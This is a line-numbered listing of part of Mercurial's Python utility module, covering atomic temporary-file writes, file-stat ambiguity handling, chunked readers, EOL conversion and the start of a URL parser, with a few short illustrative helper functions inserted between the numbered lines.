1845 1853 seps = seps.replace('\\', '\\\\')
1846 1854 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1847 1855 dir = os.path.normpath(root)
1848 1856 result = []
1849 1857 for part, sep in pattern.findall(name):
1850 1858 if sep:
1851 1859 result.append(sep)
1852 1860 continue
1853 1861
1854 1862 if dir not in _fspathcache:
1855 1863 _fspathcache[dir] = _makefspathcacheentry(dir)
1856 1864 contents = _fspathcache[dir]
1857 1865
1858 1866 found = contents.get(part)
1859 1867 if not found:
1860 1868 # retry "once per directory" per "dirstate.walk", which
1861 1869 # may take place for each patch of "hg qpush", for example
1862 1870 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1863 1871 found = contents.get(part)
1864 1872
1865 1873 result.append(found or part)
1866 1874 dir = os.path.join(dir, part)
1867 1875
1868 1876 return ''.join(result)
1869 1877
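# Illustrative sketch (not called anywhere): on a case-insensitive
# filesystem, fspath() recovers the on-disk spelling of a normcase-ed
# name, e.g. mapping b'readme.txt' back to b'README.txt'. The arguments
# below are hypothetical example values.
def _fspathexample():
    return fspath(b'readme.txt', b'/path/to/repo')
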
1870 1878 def checknlink(testfile):
1871 1879 '''check whether hardlink count reporting works properly'''
1872 1880
1873 1881 # testfile may be open, so we need a separate file for checking to
1874 1882 # work around issue2543 (or testfile may get lost on Samba shares)
1875 1883 f1, f2, fp = None, None, None
1876 1884 try:
1877 1885 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1878 1886 suffix='1~', dir=os.path.dirname(testfile))
1879 1887 os.close(fd)
1880 1888 f2 = '%s2~' % f1[:-2]
1881 1889
1882 1890 oslink(f1, f2)
1883 1891 # nlinks() may behave differently for files on Windows shares if
1884 1892 # the file is open.
1885 1893 fp = posixfile(f2)
1886 1894 return nlinks(f2) > 1
1887 1895 except OSError:
1888 1896 return False
1889 1897 finally:
1890 1898 if fp is not None:
1891 1899 fp.close()
1892 1900 for f in (f1, f2):
1893 1901 try:
1894 1902 if f is not None:
1895 1903 os.unlink(f)
1896 1904 except OSError:
1897 1905 pass
1898 1906
1899 1907 def endswithsep(path):
1900 1908 '''Check path ends with os.sep or os.altsep.'''
1901 1909 return (path.endswith(pycompat.ossep)
1902 1910 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1903 1911
1904 1912 def splitpath(path):
1905 1913 '''Split path by os.sep.
1906 1914 Note that this function does not use os.altsep because it is
1907 1915 meant as a simple alternative to "xxx.split(os.sep)".
1908 1916 It is recommended to use os.path.normpath() before using this
1909 1917 function if needed.'''
1910 1918 return path.split(pycompat.ossep)
1911 1919
1912 1920 def mktempcopy(name, emptyok=False, createmode=None):
1913 1921 """Create a temporary file with the same contents from name
1914 1922
1915 1923 The permission bits are copied from the original file.
1916 1924
1917 1925 If the temporary file is going to be truncated immediately, you
1918 1926 can use emptyok=True as an optimization.
1919 1927
1920 1928 Returns the name of the temporary file.
1921 1929 """
1922 1930 d, fn = os.path.split(name)
1923 1931 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1924 1932 os.close(fd)
1925 1933 # Temporary files are created with mode 0600, which is usually not
1926 1934 # what we want. If the original file already exists, just copy
1927 1935 # its mode. Otherwise, manually obey umask.
1928 1936 copymode(name, temp, createmode)
1929 1937 if emptyok:
1930 1938 return temp
1931 1939 try:
1932 1940 try:
1933 1941 ifp = posixfile(name, "rb")
1934 1942 except IOError as inst:
1935 1943 if inst.errno == errno.ENOENT:
1936 1944 return temp
1937 1945 if not getattr(inst, 'filename', None):
1938 1946 inst.filename = name
1939 1947 raise
1940 1948 ofp = posixfile(temp, "wb")
1941 1949 for chunk in filechunkiter(ifp):
1942 1950 ofp.write(chunk)
1943 1951 ifp.close()
1944 1952 ofp.close()
1945 1953 except: # re-raises
1946 1954 try:
1947 1955 os.unlink(temp)
1948 1956 except OSError:
1949 1957 pass
1950 1958 raise
1951 1959 return temp
1952 1960
1953 1961 class filestat(object):
1954 1962 """help to exactly detect change of a file
1955 1963
1956 1964 'stat' attribute is result of 'os.stat()' if specified 'path'
1957 1965 exists. Otherwise, it is None. This can avoid preparative
1958 1966 'exists()' examination on client side of this class.
1959 1967 """
1960 1968 def __init__(self, stat):
1961 1969 self.stat = stat
1962 1970
1963 1971 @classmethod
1964 1972 def frompath(cls, path):
1965 1973 try:
1966 1974 stat = os.stat(path)
1967 1975 except OSError as err:
1968 1976 if err.errno != errno.ENOENT:
1969 1977 raise
1970 1978 stat = None
1971 1979 return cls(stat)
1972 1980
1973 1981 @classmethod
1974 1982 def fromfp(cls, fp):
1975 1983 stat = os.fstat(fp.fileno())
1976 1984 return cls(stat)
1977 1985
1978 1986 __hash__ = object.__hash__
1979 1987
1980 1988 def __eq__(self, old):
1981 1989 try:
1982 1990 # if ambiguity between stat of new and old file is
1983 1991 # avoided, comparison of size, ctime and mtime is enough
1984 1992 # to exactly detect change of a file regardless of platform
1985 1993 return (self.stat.st_size == old.stat.st_size and
1986 1994 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1987 1995 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1988 1996 except AttributeError:
1989 1997 pass
1990 1998 try:
1991 1999 return self.stat is None and old.stat is None
1992 2000 except AttributeError:
1993 2001 return False
1994 2002
1995 2003 def isambig(self, old):
1996 2004 """Examine whether new (= self) stat is ambiguous against old one
1997 2005
1998 2006 "S[N]" below means stat of a file at N-th change:
1999 2007
2000 2008 - S[n-1].ctime < S[n].ctime: can detect change of a file
2001 2009 - S[n-1].ctime == S[n].ctime
2002 2010 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2003 2011 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2004 2012 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2005 2013 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2006 2014
2007 2015 Case (*2) above means that a file was changed twice or more
2008 2016 within the same second (= S[n-1].ctime), so comparison of
2009 2017 timestamps is ambiguous.
2010 2018
2011 2019 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2012 2020 timestamp is ambiguous".
2013 2021
2014 2022 But advancing mtime only in case (*2) doesn't work as
2015 2023 expected, because naturally advanced S[n].mtime in case (*1)
2016 2024 might be equal to manually advanced S[n-1 or earlier].mtime.
2017 2025
2018 2026 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2019 2027 treated as ambiguous regardless of mtime, so that collisions
2020 2028 between such mtimes are not overlooked.
2021 2029
2022 2030 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2023 2031 S[n].mtime", even if size of a file isn't changed.
2024 2032 """
2025 2033 try:
2026 2034 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2027 2035 except AttributeError:
2028 2036 return False
2029 2037
2030 2038 def avoidambig(self, path, old):
2031 2039 """Change file stat of specified path to avoid ambiguity
2032 2040
2033 2041 'old' should be previous filestat of 'path'.
2034 2042
2035 2043 If the process doesn't have appropriate privileges for 'path',
2036 2044 avoiding ambiguity is skipped, and this returns False in that
2037 2045 case.
2038 2046
2039 2047 Otherwise, this returns True, as "ambiguity is avoided".
2040 2048 """
2041 2049 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2042 2050 try:
2043 2051 os.utime(path, (advanced, advanced))
2044 2052 except OSError as inst:
2045 2053 if inst.errno == errno.EPERM:
2046 2054 # utime() on the file created by another user causes EPERM,
2047 2055 # if a process doesn't have appropriate privileges
2048 2056 return False
2049 2057 raise
2050 2058 return True
2051 2059
2052 2060 def __ne__(self, other):
2053 2061 return not self == other
2054 2062
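# Illustrative sketch (not called anywhere): the intended use of filestat
# when rewriting a file in place. The path is a hypothetical example.
def _filestatexample():
    oldstat = filestat.frompath(b'somefile')
    # ... rewrite b'somefile' here ...
    newstat = filestat.frompath(b'somefile')
    if newstat.isambig(oldstat):
        # size/ctime/mtime alone cannot distinguish the two versions;
        # advance mtime by one second to disambiguate.
        newstat.avoidambig(b'somefile', oldstat)
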
2055 2063 class atomictempfile(object):
2056 2064 '''writable file object that atomically updates a file
2057 2065
2058 2066 All writes will go to a temporary copy of the original file. Call
2059 2067 close() when you are done writing, and atomictempfile will rename
2060 2068 the temporary copy to the original name, making the changes
2061 2069 visible. If the object is destroyed without being closed, all your
2062 2070 writes are discarded.
2063 2071
2064 2072 The checkambig argument of the constructor is used with filestat,
2065 2073 and is useful only if the target file is guarded by a lock
2066 2074 (e.g. repo.lock or repo.wlock).
2067 2075 '''
2068 2076 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2069 2077 self.__name = name # permanent name
2070 2078 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2071 2079 createmode=createmode)
2072 2080 self._fp = posixfile(self._tempname, mode)
2073 2081 self._checkambig = checkambig
2074 2082
2075 2083 # delegated methods
2076 2084 self.read = self._fp.read
2077 2085 self.write = self._fp.write
2078 2086 self.seek = self._fp.seek
2079 2087 self.tell = self._fp.tell
2080 2088 self.fileno = self._fp.fileno
2081 2089
2082 2090 def close(self):
2083 2091 if not self._fp.closed:
2084 2092 self._fp.close()
2085 2093 filename = localpath(self.__name)
2086 2094 oldstat = self._checkambig and filestat.frompath(filename)
2087 2095 if oldstat and oldstat.stat:
2088 2096 rename(self._tempname, filename)
2089 2097 newstat = filestat.frompath(filename)
2090 2098 if newstat.isambig(oldstat):
2091 2099 # stat of changed file is ambiguous to original one
2092 2100 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2093 2101 os.utime(filename, (advanced, advanced))
2094 2102 else:
2095 2103 rename(self._tempname, filename)
2096 2104
2097 2105 def discard(self):
2098 2106 if not self._fp.closed:
2099 2107 try:
2100 2108 os.unlink(self._tempname)
2101 2109 except OSError:
2102 2110 pass
2103 2111 self._fp.close()
2104 2112
2105 2113 def __del__(self):
2106 2114 if safehasattr(self, '_fp'): # constructor actually did something
2107 2115 self.discard()
2108 2116
2109 2117 def __enter__(self):
2110 2118 return self
2111 2119
2112 2120 def __exit__(self, exctype, excvalue, traceback):
2113 2121 if exctype is not None:
2114 2122 self.discard()
2115 2123 else:
2116 2124 self.close()
2117 2125
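# Illustrative sketch (not called anywhere): atomictempfile as a context
# manager. A normal exit renames the temporary copy over the target; an
# exception inside the block discards all writes. The filename is a
# hypothetical example value.
def _atomictempfileexample():
    with atomictempfile(b'myfile', mode='wb') as fp:
        fp.write(b'new contents\n')
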
2118 2126 def unlinkpath(f, ignoremissing=False, rmdir=True):
2119 2127 """unlink and remove the directory if it is empty"""
2120 2128 if ignoremissing:
2121 2129 tryunlink(f)
2122 2130 else:
2123 2131 unlink(f)
2124 2132 if rmdir:
2125 2133 # try removing directories that might now be empty
2126 2134 try:
2127 2135 removedirs(os.path.dirname(f))
2128 2136 except OSError:
2129 2137 pass
2130 2138
2131 2139 def tryunlink(f):
2132 2140 """Attempt to remove a file, ignoring ENOENT errors."""
2133 2141 try:
2134 2142 unlink(f)
2135 2143 except OSError as e:
2136 2144 if e.errno != errno.ENOENT:
2137 2145 raise
2138 2146
2139 2147 def makedirs(name, mode=None, notindexed=False):
2140 2148 """recursive directory creation with parent mode inheritance
2141 2149
2142 2150 Newly created directories are marked as "not to be indexed by
2143 2151 the content indexing service", if ``notindexed`` is specified
2144 2152 for "write" mode access.
2145 2153 """
2146 2154 try:
2147 2155 makedir(name, notindexed)
2148 2156 except OSError as err:
2149 2157 if err.errno == errno.EEXIST:
2150 2158 return
2151 2159 if err.errno != errno.ENOENT or not name:
2152 2160 raise
2153 2161 parent = os.path.dirname(os.path.abspath(name))
2154 2162 if parent == name:
2155 2163 raise
2156 2164 makedirs(parent, mode, notindexed)
2157 2165 try:
2158 2166 makedir(name, notindexed)
2159 2167 except OSError as err:
2160 2168 # Catch EEXIST to handle races
2161 2169 if err.errno == errno.EEXIST:
2162 2170 return
2163 2171 raise
2164 2172 if mode is not None:
2165 2173 os.chmod(name, mode)
2166 2174
2167 2175 def readfile(path):
2168 2176 with open(path, 'rb') as fp:
2169 2177 return fp.read()
2170 2178
2171 2179 def writefile(path, text):
2172 2180 with open(path, 'wb') as fp:
2173 2181 fp.write(text)
2174 2182
2175 2183 def appendfile(path, text):
2176 2184 with open(path, 'ab') as fp:
2177 2185 fp.write(text)
2178 2186
2179 2187 class chunkbuffer(object):
2180 2188 """Allow arbitrary sized chunks of data to be efficiently read from an
2181 2189 iterator over chunks of arbitrary size."""
2182 2190
2183 2191 def __init__(self, in_iter):
2184 2192 """in_iter is the iterator that's iterating over the input chunks."""
2185 2193 def splitbig(chunks):
2186 2194 for chunk in chunks:
2187 2195 if len(chunk) > 2**20:
2188 2196 pos = 0
2189 2197 while pos < len(chunk):
2190 2198 end = pos + 2 ** 18
2191 2199 yield chunk[pos:end]
2192 2200 pos = end
2193 2201 else:
2194 2202 yield chunk
2195 2203 self.iter = splitbig(in_iter)
2196 2204 self._queue = collections.deque()
2197 2205 self._chunkoffset = 0
2198 2206
2199 2207 def read(self, l=None):
2200 2208 """Read L bytes of data from the iterator of chunks of data.
2201 2209 Returns less than L bytes if the iterator runs dry.
2202 2210
2203 2211 If size parameter is omitted, read everything"""
2204 2212 if l is None:
2205 2213 return ''.join(self.iter)
2206 2214
2207 2215 left = l
2208 2216 buf = []
2209 2217 queue = self._queue
2210 2218 while left > 0:
2211 2219 # refill the queue
2212 2220 if not queue:
2213 2221 target = 2**18
2214 2222 for chunk in self.iter:
2215 2223 queue.append(chunk)
2216 2224 target -= len(chunk)
2217 2225 if target <= 0:
2218 2226 break
2219 2227 if not queue:
2220 2228 break
2221 2229
2222 2230 # The easy way to do this would be to queue.popleft(), modify the
2223 2231 # chunk (if necessary), then queue.appendleft(). However, for cases
2224 2232 # where we read partial chunk content, this incurs 2 dequeue
2225 2233 # mutations and creates a new str for the remaining chunk in the
2226 2234 # queue. Our code below avoids this overhead.
2227 2235
2228 2236 chunk = queue[0]
2229 2237 chunkl = len(chunk)
2230 2238 offset = self._chunkoffset
2231 2239
2232 2240 # Use full chunk.
2233 2241 if offset == 0 and left >= chunkl:
2234 2242 left -= chunkl
2235 2243 queue.popleft()
2236 2244 buf.append(chunk)
2237 2245 # self._chunkoffset remains at 0.
2238 2246 continue
2239 2247
2240 2248 chunkremaining = chunkl - offset
2241 2249
2242 2250 # Use all of unconsumed part of chunk.
2243 2251 if left >= chunkremaining:
2244 2252 left -= chunkremaining
2245 2253 queue.popleft()
2246 2254 # The offset == 0 case is handled by the block above, so offset > 0
2247 2255 # here and this won't merely copy via ``chunk[0:]``.
2248 2256 buf.append(chunk[offset:])
2249 2257 self._chunkoffset = 0
2250 2258
2251 2259 # Partial chunk needed.
2252 2260 else:
2253 2261 buf.append(chunk[offset:offset + left])
2254 2262 self._chunkoffset += left
2255 2263 left -= chunkremaining
2256 2264
2257 2265 return ''.join(buf)
2258 2266
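# Illustrative sketch (not called anywhere): chunkbuffer turns an
# iterator of arbitrarily sized chunks into a reader supporting
# exact-size reads across chunk boundaries.
def _chunkbufferexample():
    buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
    assert buf.read(5) == b'abcde'
    assert buf.read(3) == b'fgh'
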
2259 2267 def filechunkiter(f, size=131072, limit=None):
2260 2268 """Create a generator that produces the data in the file size
2261 2269 (default 131072) bytes at a time, up to optional limit (default is
2262 2270 to read all data). Chunks may be less than size bytes if the
2263 2271 chunk is the last chunk in the file, or the file is a socket or
2264 2272 some other type of file that sometimes reads less data than is
2265 2273 requested."""
2266 2274 assert size >= 0
2267 2275 assert limit is None or limit >= 0
2268 2276 while True:
2269 2277 if limit is None:
2270 2278 nbytes = size
2271 2279 else:
2272 2280 nbytes = min(limit, size)
2273 2281 s = nbytes and f.read(nbytes)
2274 2282 if not s:
2275 2283 break
2276 2284 if limit:
2277 2285 limit -= len(s)
2278 2286 yield s
2279 2287
2280 2288 class cappedreader(object):
2281 2289 """A file object proxy that allows reading up to N bytes.
2282 2290
2283 2291 Given a source file object, instances of this type allow reading up to
2284 2292 N bytes from that source file object. Attempts to read past the allowed
2285 2293 limit are treated as EOF.
2286 2294
2287 2295 It is assumed that I/O is not performed on the original file object
2288 2296 in addition to I/O that is performed by this instance. If there is,
2289 2297 state tracking will get out of sync and unexpected results will ensue.
2290 2298 """
2291 2299 def __init__(self, fh, limit):
2292 2300 """Allow reading up to <limit> bytes from <fh>."""
2293 2301 self._fh = fh
2294 2302 self._left = limit
2295 2303
2296 2304 def read(self, n=-1):
2297 2305 if not self._left:
2298 2306 return b''
2299 2307
2300 2308 if n < 0:
2301 2309 n = self._left
2302 2310
2303 2311 data = self._fh.read(min(n, self._left))
2304 2312 self._left -= len(data)
2305 2313 assert self._left >= 0
2306 2314
2307 2315 return data
2308 2316
2309 2317 def readinto(self, b):
2310 2318 res = self.read(len(b))
2311 2319 if res is None:
2312 2320 return None
2313 2321
2314 2322 b[0:len(res)] = res
2315 2323 return len(res)
2316 2324
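# Illustrative sketch (not called anywhere): cappedreader exposes at most
# N bytes of the underlying file object and reports EOF afterwards.
def _cappedreaderexample():
    capped = cappedreader(bytesio(b'0123456789'), 4)
    assert capped.read() == b'0123'
    assert capped.read() == b''
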
2317 2325 def unitcountfn(*unittable):
2318 2326 '''return a function that renders a readable count of some quantity'''
2319 2327
2320 2328 def go(count):
2321 2329 for multiplier, divisor, format in unittable:
2322 2330 if abs(count) >= divisor * multiplier:
2323 2331 return format % (count / float(divisor))
2324 2332 return unittable[-1][2] % count
2325 2333
2326 2334 return go
2327 2335
2328 2336 def processlinerange(fromline, toline):
2329 2337 """Check that linerange <fromline>:<toline> makes sense and return a
2330 2338 0-based range.
2331 2339
2332 2340 >>> processlinerange(10, 20)
2333 2341 (9, 20)
2334 2342 >>> processlinerange(2, 1)
2335 2343 Traceback (most recent call last):
2336 2344 ...
2337 2345 ParseError: line range must be positive
2338 2346 >>> processlinerange(0, 5)
2339 2347 Traceback (most recent call last):
2340 2348 ...
2341 2349 ParseError: fromline must be strictly positive
2342 2350 """
2343 2351 if toline - fromline < 0:
2344 2352 raise error.ParseError(_("line range must be positive"))
2345 2353 if fromline < 1:
2346 2354 raise error.ParseError(_("fromline must be strictly positive"))
2347 2355 return fromline - 1, toline
2348 2356
2349 2357 bytecount = unitcountfn(
2350 2358 (100, 1 << 30, _('%.0f GB')),
2351 2359 (10, 1 << 30, _('%.1f GB')),
2352 2360 (1, 1 << 30, _('%.2f GB')),
2353 2361 (100, 1 << 20, _('%.0f MB')),
2354 2362 (10, 1 << 20, _('%.1f MB')),
2355 2363 (1, 1 << 20, _('%.2f MB')),
2356 2364 (100, 1 << 10, _('%.0f KB')),
2357 2365 (10, 1 << 10, _('%.1f KB')),
2358 2366 (1, 1 << 10, _('%.2f KB')),
2359 2367 (1, 1, _('%.0f bytes')),
2360 2368 )
2361 2369
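# Illustrative sketch (not called anywhere): bytecount picks the largest
# unit that keeps the rendered value readable. With the default
# untranslated unit strings this returns ('42 bytes', '2.20 KB', '100 MB').
def _bytecountexample():
    return bytecount(42), bytecount(2252), bytecount(100 << 20)
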
2362 2370 class transformingwriter(object):
2363 2371 """Writable file wrapper to transform data by function"""
2364 2372
2365 2373 def __init__(self, fp, encode):
2366 2374 self._fp = fp
2367 2375 self._encode = encode
2368 2376
2369 2377 def close(self):
2370 2378 self._fp.close()
2371 2379
2372 2380 def flush(self):
2373 2381 self._fp.flush()
2374 2382
2375 2383 def write(self, data):
2376 2384 return self._fp.write(self._encode(data))
2377 2385
2378 2386 # Matches a single EOL, which can be either a CRLF (where repeated CRs
2379 2387 # are removed) or a LF. We do not care about old Macintosh files, so a
2380 2388 # stray CR is an error.
2381 2389 _eolre = remod.compile(br'\r*\n')
2382 2390
2383 2391 def tolf(s):
2384 2392 return _eolre.sub('\n', s)
2385 2393
2386 2394 def tocrlf(s):
2387 2395 return _eolre.sub('\r\n', s)
2388 2396
2389 2397 def _crlfwriter(fp):
2390 2398 return transformingwriter(fp, tocrlf)
2391 2399
2392 2400 if pycompat.oslinesep == '\r\n':
2393 2401 tonativeeol = tocrlf
2394 2402 fromnativeeol = tolf
2395 2403 nativeeolwriter = _crlfwriter
2396 2404 else:
2397 2405 tonativeeol = pycompat.identity
2398 2406 fromnativeeol = pycompat.identity
2399 2407 nativeeolwriter = pycompat.identity
2400 2408
2401 2409 if (pyplatform.python_implementation() == 'CPython' and
2402 2410 sys.version_info < (3, 0)):
2403 2411 # There is an issue in CPython that some IO methods do not handle EINTR
2404 2412 # correctly. The following table shows what CPython version (and functions)
2405 2413 # are affected (buggy: has the EINTR bug, okay: otherwise):
2406 2414 #
2407 2415 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2408 2416 # --------------------------------------------------
2409 2417 # fp.__iter__ | buggy | buggy | okay
2410 2418 # fp.read* | buggy | okay [1] | okay
2411 2419 #
2412 2420 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2413 2421 #
2414 2422 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2415 2423 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2416 2424 #
2417 2425 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2418 2426 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2419 2427 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2420 2428 # fp.__iter__ but not other fp.read* methods.
2421 2429 #
2422 2430 # On modern systems like Linux, the "read" syscall cannot be interrupted
2423 2431 # when reading "fast" files like on-disk files. So the EINTR issue only
2424 2432 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2425 2433 # files approximately as "fast" files and use the fast (unsafe) code path,
2426 2434 # to minimize the performance impact.
2427 2435 if sys.version_info >= (2, 7, 4):
2428 2436 # fp.readline deals with EINTR correctly, use it as a workaround.
2429 2437 def _safeiterfile(fp):
2430 2438 return iter(fp.readline, '')
2431 2439 else:
2432 2440 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2433 2441 # note: this may block longer than necessary because of bufsize.
2434 2442 def _safeiterfile(fp, bufsize=4096):
2435 2443 fd = fp.fileno()
2436 2444 line = ''
2437 2445 while True:
2438 2446 try:
2439 2447 buf = os.read(fd, bufsize)
2440 2448 except OSError as ex:
2441 2449 # os.read only raises EINTR before any data is read
2442 2450 if ex.errno == errno.EINTR:
2443 2451 continue
2444 2452 else:
2445 2453 raise
2446 2454 line += buf
2447 2455 if '\n' in buf:
2448 2456 splitted = line.splitlines(True)
2449 2457 line = ''
2450 2458 for l in splitted:
2451 2459 if l[-1] == '\n':
2452 2460 yield l
2453 2461 else:
2454 2462 line = l
2455 2463 if not buf:
2456 2464 break
2457 2465 if line:
2458 2466 yield line
2459 2467
2460 2468 def iterfile(fp):
2461 2469 fastpath = True
2462 2470 if type(fp) is file:
2463 2471 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2464 2472 if fastpath:
2465 2473 return fp
2466 2474 else:
2467 2475 return _safeiterfile(fp)
2468 2476 else:
2469 2477 # PyPy and CPython 3 do not have the EINTR issue, so no workaround is needed.
2470 2478 def iterfile(fp):
2471 2479 return fp
2472 2480
2473 2481 def iterlines(iterator):
2474 2482 for chunk in iterator:
2475 2483 for line in chunk.splitlines():
2476 2484 yield line
2477 2485
2478 2486 def expandpath(path):
2479 2487 return os.path.expanduser(os.path.expandvars(path))
2480 2488
2481 2489 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2482 2490 """Return the result of interpolating items in the mapping into string s.
2483 2491
2484 2492 prefix is a single character string, or a two character string with
2485 2493 a backslash as the first character if the prefix needs to be escaped in
2486 2494 a regular expression.
2487 2495
2488 2496 fn is an optional function that will be applied to the replacement text
2489 2497 just before replacement.
2490 2498
2491 2499 escape_prefix is an optional flag that allows using doubled prefix for
2492 2500 its escaping.
2493 2501 """
2494 2502 fn = fn or (lambda s: s)
2495 2503 patterns = '|'.join(mapping.keys())
2496 2504 if escape_prefix:
2497 2505 patterns += '|' + prefix
2498 2506 if len(prefix) > 1:
2499 2507 prefix_char = prefix[1:]
2500 2508 else:
2501 2509 prefix_char = prefix
2502 2510 mapping[prefix_char] = prefix_char
2503 2511 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2504 2512 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2505 2513
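# Illustrative sketch (not called anywhere): interpolate() as a tiny
# template expander. The mapping and string below are hypothetical
# example values; the result is b'hg update tip'.
def _interpolateexample():
    return interpolate(b'%', {b'r': b'tip'}, b'hg update %r')
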
2506 2514 def getport(port):
2507 2515 """Return the port for a given network service.
2508 2516
2509 2517 If port is an integer, it's returned as is. If it's a string, it's
2510 2518 looked up using socket.getservbyname(). If there's no matching
2511 2519 service, error.Abort is raised.
2512 2520 """
2513 2521 try:
2514 2522 return int(port)
2515 2523 except ValueError:
2516 2524 pass
2517 2525
2518 2526 try:
2519 2527 return socket.getservbyname(pycompat.sysstr(port))
2520 2528 except socket.error:
2521 2529 raise error.Abort(_("no port number associated with service '%s'")
2522 2530 % port)
2523 2531
2524 2532 class url(object):
2525 2533 r"""Reliable URL parser.
2526 2534
2527 2535 This parses URLs and provides attributes for the following
2528 2536 components:
2529 2537
2530 2538 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2531 2539
2532 2540 Missing components are set to None. The only exception is
2533 2541 fragment, which is set to '' if present but empty.
2534 2542
2535 2543 If parsefragment is False, fragment is included in query. If
2536 2544 parsequery is False, query is included in path. If both are
2537 2545 False, both fragment and query are included in path.
2538 2546
2539 2547 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2540 2548
2541 2549 Note that for backward compatibility reasons, bundle URLs do not
2542 2550 take host names. That means 'bundle://../' has a path of '../'.
2543 2551
2544 2552 Examples:
2545 2553
2546 2554 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2547 2555 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2548 2556 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2549 2557 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2550 2558 >>> url(b'file:///home/joe/repo')
2551 2559 <url scheme: 'file', path: '/home/joe/repo'>
2552 2560 >>> url(b'file:///c:/temp/foo/')
2553 2561 <url scheme: 'file', path: 'c:/temp/foo/'>
2554 2562 >>> url(b'bundle:foo')
2555 2563 <url scheme: 'bundle', path: 'foo'>
2556 2564 >>> url(b'bundle://../foo')
2557 2565 <url scheme: 'bundle', path: '../foo'>
2558 2566 >>> url(br'c:\foo\bar')
2559 2567 <url path: 'c:\\foo\\bar'>
2560 2568 >>> url(br'\\blah\blah\blah')
2561 2569 <url path: '\\\\blah\\blah\\blah'>
2562 2570 >>> url(br'\\blah\blah\blah#baz')
2563 2571 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2564 2572 >>> url(br'file:///C:\users\me')
2565 2573 <url scheme: 'file', path: 'C:\\users\\me'>
2566 2574
2567 2575 Authentication credentials:
2568 2576
2569 2577 >>> url(b'ssh://joe:xyz@x/repo')
2570 2578 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2571 2579 >>> url(b'ssh://joe@x/repo')
2572 2580 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2573 2581
2574 2582 Query strings and fragments:
2575 2583
2576 2584 >>> url(b'http://host/a?b#c')
2577 2585 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2578 2586 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2579 2587 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2580 2588
2581 2589 Empty path:
2582 2590
2583 2591 >>> url(b'')
2584 2592 <url path: ''>
2585 2593 >>> url(b'#a')
2586 2594 <url path: '', fragment: 'a'>
2587 2595 >>> url(b'http://host/')
2588 2596 <url scheme: 'http', host: 'host', path: ''>
2589 2597 >>> url(b'http://host/#a')
2590 2598 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2591 2599
2592 2600 Only scheme:
2593 2601
2594 2602 >>> url(b'http:')
2595 2603 <url scheme: 'http'>
2596 2604 """
2597 2605
2598 2606 _safechars = "!~*'()+"
2599 2607 _safepchars = "/!~*'()+:\\"
2600 2608 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2601 2609
2602 2610 def __init__(self, path, parsequery=True, parsefragment=True):
2603 2611 # We slowly chomp away at path until we have only the path left
2604 2612 self.scheme = self.user = self.passwd = self.host = None
2605 2613 self.port = self.path = self.query = self.fragment = None
2606 2614 self._localpath = True
2607 2615 self._hostport = ''
2608 2616 self._origpath = path
2609 2617
2610 2618 if parsefragment and '#' in path:
2611 2619 path, self.fragment = path.split('#', 1)
2612 2620
2613 2621 # special case for Windows drive letters and UNC paths
2614 2622 if hasdriveletter(path) or path.startswith('\\\\'):
2615 2623 self.path = path
2616 2624 return
2617 2625
2618 2626 # For compatibility reasons, we can't handle bundle paths as
2619 2627 # normal URLS
2620 2628 if path.startswith('bundle:'):
2621 2629 self.scheme = 'bundle'
2622 2630 path = path[7:]
2623 2631 if path.startswith('//'):
2624 2632 path = path[2:]
2625 2633 self.path = path
2626 2634 return
2627 2635
2628 2636 if self._matchscheme(path):
2629 2637 parts = path.split(':', 1)
2630 2638 if parts[0]:
2631 2639 self.scheme, path = parts
2632 2640 self._localpath = False
2633 2641
2634 2642 if not path:
2635 2643 path = None
2636 2644 if self._localpath:
2637 2645 self.path = ''
2638 2646 return
2639 2647 else:
2640 2648 if self._localpath:
2641 2649 self.path = path
2642 2650 return
2643 2651
2644 2652 if parsequery and '?' in path:
2645 2653 path, self.query = path.split('?', 1)
2646 2654 if not path:
2647 2655 path = None
